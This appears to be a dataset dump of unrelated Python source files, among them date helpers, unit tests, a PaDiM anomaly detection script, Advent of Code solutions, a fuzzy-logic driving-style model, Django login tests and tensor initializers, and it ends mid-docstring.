content
stringlengths
0
894k
type
stringclasses
2 values
from datetime import datetime, date, timezone import dateutil from dateutil.relativedelta import relativedelta import re from .util import calculate_price, DELIM_VALUE_REGEX, DOT_VALUE_REGEX from isodate import parse_duration, parse_datetime import pytz def create_default_context(numeric, responseMetadata): def cff_yeardiff(datestr1, datestr2): if type(datestr1) is not str or type(datestr2) is not str: return 0 d1 = datetime.strptime(datestr1, "%Y-%m-%d") d2 = datetime.strptime(datestr2, "%Y-%m-%d") return relativedelta(d1, d2).years def cff_nthOfNextMonth(datestr, n, maxDayDiff=None): """Returns nth day of the next month after datestr. If the return date is less than maxDayDiff away from date, then go to the next month. """ if type(datestr) is not str or type(n) is not int or n <= 0: return None date = datetime.strptime(datestr, "%Y-%m-%d") new_date = (date + relativedelta(months=1)).replace(day=n) if maxDayDiff and (new_date - date).days < maxDayDiff: new_date = new_date + relativedelta(months=1) return new_date.strftime("%Y-%m-%d") # def cff_countArray(array, expression): # return len([item for item in array if calculate_price(expression, item)]) def cff_countArray(*args): # TODO: fix py-expression-eval so that the method signature above is called. # Same applies to cff_addDuration. array = list(args) expression = array.pop(-1) if type(array) is not list: return 0 return len( [ item for item in array if calculate_price(expression, item, numeric, responseMetadata) ] ) def cff_today(): return date.today().strftime("%Y-%m-%d") def cff_addDuration(dt, duration): if type(dt) is not str: return None dt = datetime.strptime(dt, "%Y-%m-%d") duration = parse_duration(duration) new_time = dt + relativedelta( months=int(getattr(duration, "months", 0)), days=int(getattr(duration, "days", 0)), years=int(getattr(duration, "years", 0)), ) return new_time.strftime("%Y-%m-%d") def cff_createdBetween(datestr1, datestr2): if type(datestr1) is not str or type(datestr2) is not str: return 0 datestr1 = re.sub( DOT_VALUE_REGEX, ".", re.sub(DELIM_VALUE_REGEX, ":", datestr1) ) datestr2 = re.sub( DOT_VALUE_REGEX, ".", re.sub(DELIM_VALUE_REGEX, ":", datestr2) ) d1 = parse_datetime(datestr1) d2 = parse_datetime(datestr2) date_created = responseMetadata.get("date_created", None) date_created = ( parse_datetime(date_created) if date_created is not None else datetime.now() ) # Convert date_created from a naive to an aware datetime, # so that it can be compared with the naive datetimems d1 and d2. # PyMongo always stores naive datetimes in UTC, so this is ok. date_created = date_created.replace(tzinfo=pytz.utc) return (date_created >= d1) and (date_created <= d2) DEFAULT_CONTEXT = { "cff_yeardiff": cff_yeardiff, "cff_nthOfNextMonth": cff_nthOfNextMonth, "cff_countArray": cff_countArray, "cff_addDuration": cff_addDuration, "cff_today": cff_today, "cff_createdBetween": cff_createdBetween, } return DEFAULT_CONTEXT
python
import container_crawler.utils import mock import unittest class TestUtils(unittest.TestCase): @mock.patch('container_crawler.utils.InternalClient') @mock.patch('container_crawler.utils.os') def test_internal_client_path(self, os_mock, ic_mock): os_mock.path.exists.return_value = True os_mock.path.join.side_effect = lambda *x: '/'.join(x) conf = {'internal_client_logname': 'TestClient', 'internal_client_path': '/etc/swift/internal-client.conf'} container_crawler.utils.create_internal_client(conf, '/etc/swift') ic_mock.assert_called_once_with(conf['internal_client_path'], conf['internal_client_logname'], 3) @mock.patch('container_crawler.utils.ConfigString') @mock.patch('container_crawler.utils.InternalClient') @mock.patch('container_crawler.utils.os') def test_internal_client_path_not_found(self, os_mock, ic_mock, conf_mock): os_mock.path.exists.return_value = False os_mock.path.join.side_effect = lambda *x: '/'.join(x) conf_string = mock.Mock() conf_mock.return_value = conf_string conf = {'internal_client_logname': 'TestClient', 'internal_client_path': '/etc/swift/internal-client.conf'} container_crawler.utils.create_internal_client(conf, '/etc/swift') os_mock.path.exists.assert_called_once_with( conf['internal_client_path']) conf_mock.assert_called_once_with( container_crawler.utils.INTERNAL_CLIENT_CONFIG) ic_mock.assert_called_once_with( conf_string, conf['internal_client_logname'], 3)
python
import random from random import sample import argparse import numpy as np import os import pickle from tqdm import tqdm from collections import OrderedDict from sklearn.metrics import roc_auc_score from sklearn.metrics import roc_curve from sklearn.metrics import precision_recall_curve from sklearn.covariance import LedoitWolf from scipy.spatial.distance import mahalanobis from scipy.ndimage import gaussian_filter from skimage import morphology from skimage.segmentation import mark_boundaries import matplotlib.pyplot as plt import matplotlib import torch import torch.nn.functional as F from torch.utils.data import DataLoader from torchvision.models import wide_resnet50_2, resnet18 import datasets.mvtec as mvtec # device setup use_cuda = torch.cuda.is_available() device = torch.device('cuda' if use_cuda else 'cpu') def parse_args(): parser = argparse.ArgumentParser('PaDiM') parser.add_argument('--data_path', type=str, default='./datasets') parser.add_argument('--save_path', type=str, default='./fundus_result') parser.add_argument('--arch', type=str, choices=['resnet18', 'wide_resnet50_2'], default='resnet18') return parser.parse_args() _layer1 = 'layer2' _layer2 = 'layer3' _layer3 = 'layer3' def main(): args = parse_args() # load model if args.arch == 'resnet18': model = resnet18(pretrained=True, progress=True) t_d = 384 d = 100 elif args.arch == 'wide_resnet50_2': model = wide_resnet50_2(pretrained=True, progress=True) t_d = 1792 d = 550 model.to(device) model.eval() random.seed(1024) torch.manual_seed(1024) if use_cuda: torch.cuda.manual_seed_all(1024) idx = torch.tensor(sample(range(0, t_d), d)) # print(f'--> {idx.shape}') # set model's intermediate outputs outputs = [] def hook(module, input, output): outputs.append(output) model.layer2[-1].register_forward_hook(hook) model.layer3[-1].register_forward_hook(hook) # model.layer3[-1].register_forward_hook(hook) os.makedirs(os.path.join(args.save_path, 'temp_%s' % args.arch), exist_ok=True) fig, ax = plt.subplots(1, 2, figsize=(20, 10)) fig_img_rocauc = ax[0] fig_pixel_rocauc = ax[1] total_roc_auc = [] total_pixel_roc_auc = [] for class_name in mvtec.CLASS_NAMES: train_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=True) train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True) test_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=False) test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True) train_outputs = OrderedDict([(_layer1, []), (_layer2, [])]) test_outputs = OrderedDict([(_layer1, []), (_layer2, [])]) # train_outputs = OrderedDict([('layer2', []), ('layer3', []), ('layer4', [])]) # test_outputs = OrderedDict([('layer2', []), ('layer3', []), ('layer4', [])]) # extract train set features train_feature_filepath = os.path.join(args.save_path, 'temp_%s' % args.arch, 'train_%s.pkl' % class_name) if not os.path.exists(train_feature_filepath): for (x, _, _) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name): # model prediction with torch.no_grad(): _ = model(x.to(device)) # get intermediate layer outputs for k, v in zip(train_outputs.keys(), outputs): train_outputs[k].append(v.cpu().detach()) # initialize hook outputs outputs = [] for k, v in train_outputs.items(): train_outputs[k] = torch.cat(v, 0) # Embedding concat embedding_vectors = train_outputs[_layer1] for layer_name in [_layer2]: embedding_vectors = embedding_concat(embedding_vectors, train_outputs[layer_name]) print(f'--> {embedding_vectors.shape}') # randomly select d dimension embedding_vectors = torch.index_select(embedding_vectors, 1, idx) # calculate multivariate Gaussian distribution B, C, H, W = embedding_vectors.size() embedding_vectors = embedding_vectors.view(B, C, H * W) mean = torch.mean(embedding_vectors, dim=0).numpy() cov = torch.zeros(C, C, H * W).numpy() I = np.identity(C) for i in range(H * W): # cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_ cov[:, :, i] = np.cov(embedding_vectors[:, :, i].numpy(), rowvar=False) + 0.01 * I # save learned distribution train_outputs = [mean, cov] with open(train_feature_filepath, 'wb') as f: pickle.dump(train_outputs, f) else: print('load train set feature from: %s' % train_feature_filepath) with open(train_feature_filepath, 'rb') as f: train_outputs = pickle.load(f) gt_list = [] gt_mask_list = [] test_imgs = [] # extract test set features for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name): test_imgs.extend(x.cpu().detach().numpy()) gt_list.extend(y.cpu().detach().numpy()) gt_mask_list.extend(mask.cpu().detach().numpy()) # model prediction with torch.no_grad(): _ = model(x.to(device)) # get intermediate layer outputs for k, v in zip(test_outputs.keys(), outputs): test_outputs[k].append(v.cpu().detach()) # initialize hook outputs outputs = [] for k, v in test_outputs.items(): test_outputs[k] = torch.cat(v, 0) # Embedding concat embedding_vectors = test_outputs[_layer1] for layer_name in [_layer2]: embedding_vectors = embedding_concat(embedding_vectors, test_outputs[layer_name]) # randomly select d dimension embedding_vectors = torch.index_select(embedding_vectors, 1, idx) # calculate distance matrix B, C, H, W = embedding_vectors.size() embedding_vectors = embedding_vectors.view(B, C, H * W).numpy() dist_list = [] for i in range(H * W): mean = train_outputs[0][:, i] conv_inv = np.linalg.inv(train_outputs[1][:, :, i]) dist = [mahalanobis(sample[:, i], mean, conv_inv) for sample in embedding_vectors] dist_list.append(dist) dist_list = np.array(dist_list).transpose(1, 0).reshape(B, H, W) # upsample dist_list = torch.tensor(dist_list) score_map = F.interpolate(dist_list.unsqueeze(1), size=x.size(2), mode='bilinear', align_corners=False).squeeze().numpy() # apply gaussian smoothing on the score map for i in range(score_map.shape[0]): score_map[i] = gaussian_filter(score_map[i], sigma=4) # Normalization max_score = score_map.max() min_score = score_map.min() scores = (score_map - min_score) / (max_score - min_score) # calculate image-level ROC AUC score img_scores = scores.reshape(scores.shape[0], -1).max(axis=1) gt_list = np.asarray(gt_list) fpr, tpr, _ = roc_curve(gt_list, img_scores) img_roc_auc = roc_auc_score(gt_list, img_scores) total_roc_auc.append(img_roc_auc) print('image ROCAUC: %.3f' % (img_roc_auc)) fig_img_rocauc.plot(fpr, tpr, label='%s img_ROCAUC: %.3f' % (class_name, img_roc_auc)) # get optimal threshold gt_mask = np.asarray(gt_mask_list) precision, recall, thresholds = precision_recall_curve(gt_mask.flatten(), scores.flatten()) a = 2 * precision * recall b = precision + recall f1 = np.divide(a, b, out=np.zeros_like(a), where=b != 0) threshold = thresholds[np.argmax(f1)] # # calculate per-pixel level ROCAUC # fpr, tpr, _ = roc_curve(gt_mask.flatten(), scores.flatten()) # per_pixel_rocauc = roc_auc_score(gt_mask.flatten(), scores.flatten()) # total_pixel_roc_auc.append(per_pixel_rocauc) # print('pixel ROCAUC: %.3f' % (per_pixel_rocauc)) # fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc)) save_dir = args.save_path + '/' + f'pictures_{args.arch}' os.makedirs(save_dir, exist_ok=True) plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name) print('Average ROCAUC: %.3f' % np.mean(total_roc_auc)) fig_img_rocauc.title.set_text('Average image ROCAUC: %.3f' % np.mean(total_roc_auc)) fig_img_rocauc.legend(loc="lower right") # print('Average pixel ROCUAC: %.3f' % np.mean(total_pixel_roc_auc)) # fig_pixel_rocauc.title.set_text('Average pixel ROCAUC: %.3f' % np.mean(total_pixel_roc_auc)) # fig_pixel_rocauc.legend(loc="lower right") fig.tight_layout() fig.savefig(os.path.join(args.save_path, 'roc_curve.png'), dpi=100) def plot_fig(test_img, scores, gts, threshold, save_dir, class_name): num = len(scores) vmax = scores.max() * 255. vmin = scores.min() * 255. for i in range(num): img = test_img[i] img = denormalization(img) # gt = gts[i].transpose(1, 2, 0).squeeze() heat_map = scores[i] * 255 mask = scores[i] mask[mask > threshold] = 1 mask[mask <= threshold] = 0 kernel = morphology.disk(4) mask = morphology.opening(mask, kernel) mask *= 255 vis_img = mark_boundaries(img, mask, color=(1, 0, 0), mode='thick') fig_img, ax_img = plt.subplots(1, 5, figsize=(12, 3)) fig_img.subplots_adjust(right=0.9) norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax) for ax_i in ax_img: ax_i.axes.xaxis.set_visible(False) ax_i.axes.yaxis.set_visible(False) ax_img[0].imshow(img) ax_img[0].title.set_text('Image') # ax_img[1].imshow(gt, cmap='gray') ax_img[1].title.set_text('GroundTruth') ax = ax_img[2].imshow(heat_map, cmap='jet', norm=norm) ax_img[2].imshow(img, cmap='gray', interpolation='none') ax_img[2].imshow(heat_map, cmap='jet', alpha=0.5, interpolation='none') ax_img[2].title.set_text('Predicted heat map') ax_img[3].imshow(mask, cmap='gray') ax_img[3].title.set_text('Predicted mask') ax_img[4].imshow(vis_img) ax_img[4].title.set_text('Segmentation result') left = 0.92 bottom = 0.15 width = 0.015 height = 1 - 2 * bottom rect = [left, bottom, width, height] cbar_ax = fig_img.add_axes(rect) cb = plt.colorbar(ax, shrink=0.6, cax=cbar_ax, fraction=0.046) cb.ax.tick_params(labelsize=8) font = { 'family': 'serif', 'color': 'black', 'weight': 'normal', 'size': 8, } cb.set_label('Anomaly Score', fontdict=font) fig_img.savefig(os.path.join(save_dir, class_name + '_{}'.format(i)), dpi=100) plt.close() def denormalization(x): mean = np.array([0.485, 0.456, 0.406]) std = np.array([0.229, 0.224, 0.225]) x = (((x.transpose(1, 2, 0) * std) + mean) * 255.).astype(np.uint8) return x def embedding_concat(x, y): B, C1, H1, W1 = x.size() _, C2, H2, W2 = y.size() s = int(H1 / H2) x = F.unfold(x, kernel_size=s, dilation=1, stride=s) x = x.view(B, C1, -1, H2, W2) z = torch.zeros(B, C1 + C2, x.size(2), H2, W2) for i in range(x.size(2)): z[:, :, i, :, :] = torch.cat((x[:, :, i, :, :], y), 1) z = z.view(B, -1, H2 * W2) z = F.fold(z, kernel_size=s, output_size=(H1, W1), stride=s) return z if __name__ == '__main__': main()
python
""" A QUANTIDADE DE UMA LETRA, A PRIMEIRA E A ÚLTIMA VEZ QUE APARECERAM NA FRASE! """ frase = str(input('Digite uma frase: ')).strip() frase = frase.upper() print('A quantidade de A é {} '.format(frase.count('A'))) print('A primeira vez que A apareceu foi: {} '.format(frase.find('A')+1)) print('A última vez que A apareceu foi: {} '.format(frase.rfind('A')+1)) ''' dividido = frase.split() print(dividido)] print(''.format(dividido[].count(['a']))) '''
python
ll=range(5, 20, 5) for i in ll: print(i) print (ll) x = 'Python' for i in range(len(x)) : print(x[i])
python
from typing import Sequence, Union from PIL import Image class BaseTransform: """ Generic image transform type class """ slug: Union[None, str] = None # unique string that identifies a given transform @staticmethod def apply_transform( img: Image.Image, parameters: Sequence[Union[str, int]] ) -> Image.Image: raise NotImplementedError @staticmethod def derive_parameters(query: str) -> Sequence[Union[str, int]]: raise NotImplementedError
python
from collections import Counter input_data = open("day12.input").read().split("\n") input_data = [tuple(a.split("-")) for a in input_data] connections = [] for (a, b) in input_data: if a != 'start': connections.append((b, a)) connections += input_data connections.sort() def part1(path, b): return b not in path def part2(path, b): count = Counter(path + [b]) lower2 = 0 for key in count.keys(): if key in ['start', 'end'] and count[key] > 1: return False if key.islower() and count[key] > 1: if count[key] < 3: lower2 += 1 else: return False return lower2 <= 1 start_paths = [['start']] end_paths = [] while True: new_paths = [] for path in start_paths: for (a, b) in connections: if path[-1] == a and b == 'end': end_paths.append(path + [b]) elif path[-1] == a and (b.isupper() or part2(path, b)): new_paths.append(path + [b]) if len(new_paths) > 0: start_paths = new_paths else: break print('Result') for path in end_paths: print(path) print(len(end_paths))
python
import os import numpy as np import pandas as pd from typing import Any, Dict, List, Optional, Tuple, NoReturn import skfuzzy as fuzz import skfuzzy.control as ctrl from aggregation import OWA_T1 import matplotlib.pyplot as plt class FLST1Model(object): def __init__(self, rules_path:str, expert_mode:str): self.antecedent = {} self.consequent = {} self.expert_mode = expert_mode self.build_model() self.system = self.build_rules(rules_dir=rules_path) self.fuzz_inf = ctrl.ControlSystemSimulation(self.system, flush_after_run=10) def build_model(self)->NoReturn: # ANTECENDENT self.antecedent = {} ### Acceleration self.antecedent['Acceleration'] = ctrl.Antecedent(universe=np.linspace(0,10, 11), label='Acceleration') self.antecedent['Acceleration']['small'] = \ fuzz.trapmf(self.antecedent['Acceleration'].universe, [0., 0., 3., 4.]) self.antecedent['Acceleration']['medium'] = \ fuzz.trapmf(self.antecedent['Acceleration'].universe, [3., 4., 6., 7.]) self.antecedent['Acceleration']['large'] = \ fuzz.trapmf(self.antecedent['Acceleration'].universe, [6., 7., 10., 10.]) ### Deceleration self.antecedent['Deceleration'] = ctrl.Antecedent(universe=np.linspace(0,10, 11), label='Deceleration') self.antecedent['Deceleration']['small'] = \ fuzz.trapmf(self.antecedent['Deceleration'].universe, [0., 0., 3., 4.]) self.antecedent['Deceleration']['medium'] = \ fuzz.trapmf(self.antecedent['Deceleration'].universe, [3., 4., 6., 7.]) self.antecedent['Deceleration']['large'] = \ fuzz.trapmf(self.antecedent['Deceleration'].universe, [6., 7., 10., 10.]) ### Lateral Jerk self.antecedent['LateralJerk'] = ctrl.Antecedent(universe=np.linspace(0,16, 17), label='LateralJerk') self.antecedent['LateralJerk']['small'] = \ fuzz.trapmf(self.antecedent['LateralJerk'].universe, [0., 0., 4., 6.]) self.antecedent['LateralJerk']['medium'] = \ fuzz.trapmf(self.antecedent['LateralJerk'].universe, [4., 6., 10., 12.]) self.antecedent['LateralJerk']['large'] = \ fuzz.trapmf(self.antecedent['LateralJerk'].universe, [10., 12., 16., 16.]) ### Velocity self.antecedent['Velocity'] = ctrl.Antecedent(universe=np.linspace(0,100, 101), label='Velocity') self.antecedent['Velocity']['very_slow'] = fuzz.trapmf( self.antecedent['Velocity'].universe, [0., 0., 15., 20.]) self.antecedent['Velocity']['slow'] = fuzz.trapmf( self.antecedent['Velocity'].universe, [15., 20., 30., 35.]) self.antecedent['Velocity']['normal'] = fuzz.trapmf( self.antecedent['Velocity'].universe, [30., 35., 50., 55.]) self.antecedent['Velocity']['fast'] = fuzz.trapmf( self.antecedent['Velocity'].universe, [50., 55., 70., 75.]) self.antecedent['Velocity']['very_fast'] = fuzz.trapmf( self.antecedent['Velocity'].universe, [70., 75., 100., 100.]) # CONSEQUENT ### Behavior (Driving Style) self.consequent['Behavior'] = ctrl.Consequent(universe=np.linspace(0,1., 11), label='Behavior') self.consequent['Behavior']['calm'] = fuzz.trapmf(self.consequent['Behavior'].universe, [0., 0., 0.2, 0.4]) self.consequent['Behavior']['moderate'] = fuzz.trapmf(self.consequent['Behavior'].universe, [0.2, 0.4, 0.6, 0.8]) self.consequent['Behavior']['aggressive'] = fuzz.trapmf(self.consequent['Behavior'].universe, [0.6, 0.8, 1., 1.]) def build_rules(self, rules_dir:str)->ctrl.ControlSystem: assert os.path.exists(rules_dir),\ ('[Fuzzy Logic System T1 model][build_rules][ERROR]' ' rules_dir not found!{}').format(rules_dir) rules_files = os.listdir(rules_dir) rules = None if self.expert_mode=='single': rules_files[0] = 'rules_0.csv' print('[Fuzzy Logic System T1 mode][build rules]', end='') print(f' single expert system! (rule:{rules_files[0]})') rules = self._single_expert_rules(os.path.join(rules_dir, rules_files[0])) elif self.expert_mode=='multiple': print('[Fuzzy Logic System - T1][build_rules]', end='') print(f' multiple expert system: (n_e: {len(rules_files)})') rules = self._multiple_expert_rules(rules_files, root_dir=rules_dir) else: assert False,\ ('[Fuzzy Logic System T1 model][build_rules][ERROR]' ' expert_mode invalid! {}').format(self.expert_mode) assert rules is not None,\ ('[Fuzzy Logic System T1 model][build_rules][ERROR]' ' error while building rules..') system = ctrl.ControlSystem(rules=rules) return system def _single_expert_rules(self, rule_file:str)->List: rules = pd.read_csv(rule_file) assert rules.shape[1] == 5,\ ('[Fuzzy Logic System T1 model][build_rules] wrong rule_file shape' '{} != (m, 5)'.format(rules.shape)) domain = {'calm':'calm', 'more_calm_than_moderate':'calm', 'between_calm_and_moderate':'moderate', 'more_moderate_than_calm':'moderate', 'moderate':'moderate', 'more_moderate_than_aggressive':'moderate', 'between_moderate_and_aggressive':'aggressive', 'more_aggressive_than_moderate':'aggressive', 'aggressive':'aggressive'} #self._check_rules(rules=rules) fuzz_rules = [] for line in rules.iterrows(): index, r = line[0], line[1] xs = domain[r['driving_style']] fr = ctrl.Rule(antecedent=(self.antecedent['Velocity'][r['velocity']] &\ self.antecedent['Acceleration'][r['acceleration']] &\ self.antecedent['Deceleration'][r['deceleration']] &\ self.antecedent['LateralJerk'][r['lateral_jerk']]), consequent=self.consequent['Behavior'][xs], label=f'rule - {index}') fuzz_rules.append(fr) return fuzz_rules def _multiple_expert_function(self, label:str)->float: domain = {'calm':1, 'more_calm_than_moderate':2, 'between_calm_and_moderate':3, 'more_moderate_than_calm':4, 'moderate':5, 'more_moderate_than_aggressive':6, 'between_moderate_and_aggressive':7, 'more_aggressive_than_moderate':8, 'aggressive':9} return (1./9.)*domain[label] def _multiple_expert_rules(self, rules_files:List[str], root_dir:str)->NoReturn: rules = None #get rules decisions = [] for rule_file in rules_files: _file = pd.read_csv(os.path.join(root_dir,rule_file)) decisions.append(_file['driving_style'].values) rules = _file[['velocity', 'acceleration', 'deceleration', 'lateral_jerk']] decisions = np.asarray(decisions).T #aggregate decisions y = [] for d in decisions: #print(d, end="") xs = np.array([self._multiple_expert_function(label=l) for l in d]) value = OWA_T1(X=xs,kind=2) memb_value, set_labels = self._fuzz_driving_style(value=value) y.append(set_labels[np.argmax(memb_value)]) #print(y[-1]) #create rules fuzz_rules = [] for line, _y in zip(rules.iterrows(), y): index, r = line[0], line[1] fr = ctrl.Rule(antecedent=(self.antecedent['Velocity'][r['velocity']] &\ self.antecedent['Acceleration'][r['acceleration']] &\ self.antecedent['Deceleration'][r['deceleration']] &\ self.antecedent['LateralJerk'][r['lateral_jerk']]), consequent=self.consequent['Behavior'][_y], label=f'rule - {index}') fuzz_rules.append(fr) return fuzz_rules def _fuzz_driving_style(self,value:float)->Tuple: memb_value = [] set_labels = [] for label, term in self.consequent['Behavior'].terms.items(): mi =fuzz.interp_membership(self.consequent['Behavior'].universe, term.mf, value) memb_value.append(mi) set_labels.append(label) return memb_value, set_labels def inference(self, observation:Dict) -> Dict: """ perform inference at the fuzzy system """ vel = observation['velocity']*3.6 #m/s -> Km/h acc = observation['acceleration'] #m/s^2 dec = observation['deceleration'] #m/s^2 ljk = observation['lateral_jerk'] #std (m/s^3) self.fuzz_inf.input['Acceleration'] = acc self.fuzz_inf.input['Deceleration'] = dec self.fuzz_inf.input['LateralJerk'] = ljk self.fuzz_inf.input['Velocity'] = vel self.fuzz_inf.compute() y = self.fuzz_inf.output['Behavior'] memb_value, set_labels = self._fuzz_driving_style(value=y) result = {} result['value'] = y result['membership_values'] = np.asarray(memb_value) result['set_labels']=set_labels return result def plot(self)-> NoReturn: self.antecedent['Acceleration'].view() self.antecedent['Deceleration'].view() self.antecedent['Velocity'].view() self.consequent['Behavior'].view() plt.show()
python
from distutils.core import setup from Cython.Build import cythonize setup(ext_modules = cythonize('fasterloop.pyx'))
python
#!/usr/bin/env python3 # -*- coding:utf-8 -*- from enum import Enum, unique @unique class AnalyzeFieldIdx(Enum): IDX_MODULE_NAME = 0 IDX_ANALYE_NAME = 1 IDX_COLUMN_INFO = 2 IDX_IS_EXECUTE = 3
python
import unittest from . import day01 class TestDay1(unittest.TestCase): def test_basic(self): self.assertEqual('hello', 'hello') def test_fuel_is_calculated_correctly_for_given_examples(self): self.assertEqual(day01.get_fuel_required(module_mass=12), 2) self.assertEqual(day01.get_fuel_required(module_mass=14), 2) self.assertEqual(day01.get_fuel_required(module_mass=1969), 654) self.assertEqual(day01.get_fuel_required(module_mass=100756), 33583) def test_fuel_for_fuel_is_calculated_correctly_for_given_examples(self): self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=2), 0) self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=654), 966-654) self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=33583), 50346-33583) if __name__ == "__main__": unittest.main()
python
# Code by JohnXdator n,k = map(int,input().split()) ups = list(map(int,input().split())) count = 0 for i in range(n): if ups[k-1] == 0 and ups[i] == ups[k-1]: count>=count+0 elif ups[k-1] <= ups[i]: count=count+1 else: count=count+0 print(count)
python
from django.test import TestCase from django.core.management import call_command class TestUi(TestCase): def setUp(self): call_command('loaddata', 'user', verbosity=0) call_command('loaddata', 'init', verbosity=0) call_command('loaddata', 'test/testWorld', verbosity=0) def test_ui(self): response = self.client.post('/ui/login/', {'username': 'admin', 'password': 'admin1379'}) self.assertEqual(response.status_code, 200) def test_wrong_pwd(self): response = self.client.post('/ui/login/', {'username': 'admin', 'password': 'admin137xxx'}) self.assertEqual(response.status_code, 401) def test_bad_user(self): response = self.client.post('/ui/login/', {'username': 'adminxxx', 'password': 'admin1379'}) self.assertEqual(response.status_code, 401)
python
import math import warnings from torch import Tensor import torch.nn as nn def zeros_(): """Return the initializer filling the input Tensor with the scalar zeros""" def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): return nn.init.zeros_(tensor) return initializer def ones_(): """Return the initializer filling the input Tensor with the scalar ones""" def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): return nn.init.ones_(tensor) return initializer def uniform_(a: float = 0., b: float = 1.): r"""Return the initializer filling the input Tensor with values drawn from the uniform distribution :math:`\mathcal{U}(a, b)`. Args: a (float): the lower bound of the uniform distribution. Defaults 0.0. b (float): the upper bound of the uniform distribution. Defaults 1.0. """ def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): return nn.init.uniform_(tensor, a, b) return initializer def normal_(mean: float = 0., std: float = 1.): r"""Return the initializer filling the input Tensor with values drawn from the normal distribution .. math:: \mathcal{N}(\text{mean}, \text{std}^2) Args: mean (float): the mean of the normal distribution. Defaults 0.0. std (float): the standard deviation of the normal distribution. Defaults 1.0. """ def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): return nn.init.normal_(tensor, mean, std) return initializer def trunc_normal_(mean: float = 0., std: float = 1., a: float = -2., b: float = 2.): r"""Return the initializer filling the input Tensor with values drawn from a truncated normal distribution. The values are effectively drawn from the normal distribution :math:`\mathcal{N}(\text{mean}, \text{std}^2)` with values outside :math:`[a, b]` redrawn until they are within the bounds. The method used for generating the random values works best when :math:`a \leq \text{mean} \leq b`. Args: mean (float): the mean of the normal distribution. Defaults 0.0. std (float): the standard deviation of the normal distribution. Defaults 1.0. a (float): the minimum cutoff value. Defaults -2.0. b (float): the maximum cutoff value. Defaults 2.0. """ def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): return nn.init.trunc_normal_(tensor, mean, std, a, b) return initializer def kaiming_uniform_(a=0, mode='fan_in', nonlinearity='leaky_relu'): r"""Return the initializer filling the input `Tensor` with values according to the method described in `Delving deep into rectifiers: Surpassing human-level performance on ImageNet classification` - He, K. et al. (2015), using a uniform distribution. The resulting tensor will have values sampled from :math:`\mathcal{U}(-\text{bound}, \text{bound})` where .. math:: \text{bound} = \text{gain} \times \sqrt{\frac{3}{\text{fan_mode}}} Also known as 'He initialization'. Args: a (int): the negative slope of the rectifier used after this layer (only used with ``'leaky_relu'``). mode (str, optional): either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'`` preserves the magnitude of the variance of the weights in the forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the backwards pass. nonlinearity (str, optional): the non-linear function (`nn.functional` name), recommended to use only with ``'relu'`` or ``'leaky_relu'`` (default). """ # adapted from torch.nn.init def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): if 0 in tensor.shape: warnings.warn("Initializing zero-element tensors is a no-op") return tensor if mode == 'fan_in': assert fan_in is not None, 'Fan_in is not provided.' fan = fan_in elif mode == 'fan_out': assert fan_out is not None, 'Fan_out is not provided.' fan = fan_out else: raise ValueError(f'Invalid initialization mode \'{mode}\'') std = nn.init.calculate_gain(nonlinearity, a) / math.sqrt(fan) bound = math.sqrt(3.) * std return nn.init.uniform_(tensor, -bound, bound) return initializer def kaiming_normal_(a=0, mode='fan_in', nonlinearity='leaky_relu'): r"""Return the initializer filling the input `Tensor` with values according to the method described in `Delving deep into rectifiers: Surpassing human-level performance on ImageNet classification` - He, K. et al. (2015), using a normal distribution. The resulting tensor will have values sampled from :math:`\mathcal{N}(0, \text{std}^2)` where .. math:: \text{std} = \frac{\text{gain}}{\sqrt{\text{fan_mode}}} Also known as 'He initialization'. Args: a (int): the negative slope of the rectifier used after this layer (only used with ``'leaky_relu'``). mode (str, optional): either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'`` preserves the magnitude of the variance of the weights in the forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the backwards pass. nonlinearity (str, optional): the non-linear function (`nn.functional` name), recommended to use only with ``'relu'`` or ``'leaky_relu'`` (default). """ # adapted from torch.nn.init def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): if 0 in tensor.shape: warnings.warn("Initializing zero-element tensors is a no-op") return tensor if mode == 'fan_in': assert fan_in is not None, 'Fan_in is not provided.' fan = fan_in elif mode == 'fan_out': assert fan_out is not None, 'Fan_out is not provided.' fan = fan_out else: raise ValueError(f'Invalid initialization mode \'{mode}\'') std = nn.init.calculate_gain(nonlinearity, a) / math.sqrt(fan) return nn.init.normal_(tensor, 0, std) return initializer def xavier_uniform_(a: float = math.sqrt(3.), scale: float = 2., gain: float = 1.): r"""Return the initializer filling the input `Tensor` with values according to the method described in `Understanding the difficulty of training deep feedforward neural networks` - Glorot, X. & Bengio, Y. (2010), using a uniform distribution. The resulting tensor will have values sampled from :math:`\mathcal{U}(-a, a)` where .. math:: a = \text{gain} \times \sqrt{\frac{6}{\text{fan_in} + \text{fan_out}}} Also known as 'Glorot initialization'. Args: a (float, optional): an optional scaling factor used to calculate uniform bounds from standard deviation. Defaults ``math.sqrt(3.)``. scale (float, optional): an optional scaling factor used to calculate standard deviation. Defaults 2.0. gain (float, optional): an optional scaling factor. Defaults 1.0. """ # adapted from torch.nn.init def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None): assert fan_in is not None, 'Fan_in is not provided.' fan = fan_in if fan_out is not None: fan += fan_out std = gain * math.sqrt(scale / float(fan)) bound = a * std return nn.init.uniform_(tensor, -bound, bound) return initializer def xavier_normal_(scale: float = 2., gain: float = 1.): r"""Return the initializer filling the input `Tensor` with values according to the method described in 